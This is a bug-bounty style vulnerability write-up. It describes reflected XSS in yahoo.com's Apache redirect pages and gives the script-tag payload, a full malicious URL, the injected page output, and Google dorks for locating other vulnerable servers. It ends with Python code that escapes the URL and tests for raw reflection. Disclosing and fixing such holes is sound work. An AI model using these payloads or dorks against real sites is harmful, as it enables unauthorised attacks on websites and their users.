XSS at yahoo.com

From Hackipedia
OpenBugBounty #139816
Target: Yahoo.com
Target Module:
Type: XSS
Original Link
Payload: R3NW4_KURD--><script>alert(/XSSPOSED/)</script>

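Yahoo employed Apache Transport Servers that were vulnerable to XSS on the moved_temporarily/moved_permanently pages: the requested URL is written into the body of the "Document Has Moved" page without HTML escaping, as the injection example below shows.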

More can be read about it here: Apache Ticket




How To Perform

You should be able to find instances of this XSS using Google dorks:

intitle:"Document Has Moved"
"Description: The document you requested has moved to a new location.  The new location is"

Malicious URL

http://www.yahoo.com/R3NW4_KURD--><script>alert(/XSSPOSED/)</script>

Injection Example

<HTML>
<HEAD>
<TITLE>Document Has Moved</TITLE>
</HEAD>

<BODY BGCOLOR="white" FGCOLOR="black">
<H1>Document Has Moved</H1>
<HR>

<FONT FACE="Helvetica,Arial"><B>
Description: The document you requested has moved to a new location.  The new location is "https://www.yahoo.com/R3NW4_KURD--><script>alert(/XSSPOSED/)</script>".
</B></FONT>
<HR>
</BODY>
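
The fix for this class of bug is to HTML-escape the redirect target before writing it into the page body. The following is an added example, not code from the original page or from the Apache project: it rebuilds the body shown above with and without escaping and includes a regression check for raw reflection. The function names and the template constant are assumptions made for illustration.

```python
import html

# Body layout copied from the "Injection Example" above; {location} marks the
# spot where the server inserts the redirect target.
MOVED_TEMPLATE = (
    "<HTML>\n<HEAD>\n<TITLE>Document Has Moved</TITLE>\n</HEAD>\n\n"
    '<BODY BGCOLOR="white" FGCOLOR="black">\n<H1>Document Has Moved</H1>\n<HR>\n\n'
    '<FONT FACE="Helvetica,Arial"><B>\n'
    "Description: The document you requested has moved to a new location.  "
    'The new location is "{location}".\n'
    "</B></FONT>\n<HR>\n</BODY>\n"
)


def render_vulnerable(location: str) -> str:
    """Behaviour shown on the page: the URL is copied into the body as-is."""
    return MOVED_TEMPLATE.format(location=location)


def render_hardened(location: str) -> str:
    """Same page, with the URL HTML-escaped before it is inserted."""
    return MOVED_TEMPLATE.format(location=html.escape(location, quote=True))


def reflects_raw_markup(body: str, location: str) -> bool:
    """Regression check: True if a location that contains HTML metacharacters
    appears verbatim (unescaped) in the response body."""
    has_meta = any(ch in location for ch in "<>\"'&")
    return has_meta and location in body


# The redirect target from the injection example on this page, used as input.
SAMPLE = "https://www.yahoo.com/R3NW4_KURD--><script>alert(/XSSPOSED/)</script>"

if __name__ == "__main__":
    for name, render in (("vulnerable", render_vulnerable),
                         ("hardened", render_hardened)):
        body = render(SAMPLE)
        print(f"{name}: reflects raw markup = {reflects_raw_markup(body, SAMPLE)}")
```

The same check can be run against the error and redirect bodies of any proxy you operate by passing the captured response body and the URL that was requested.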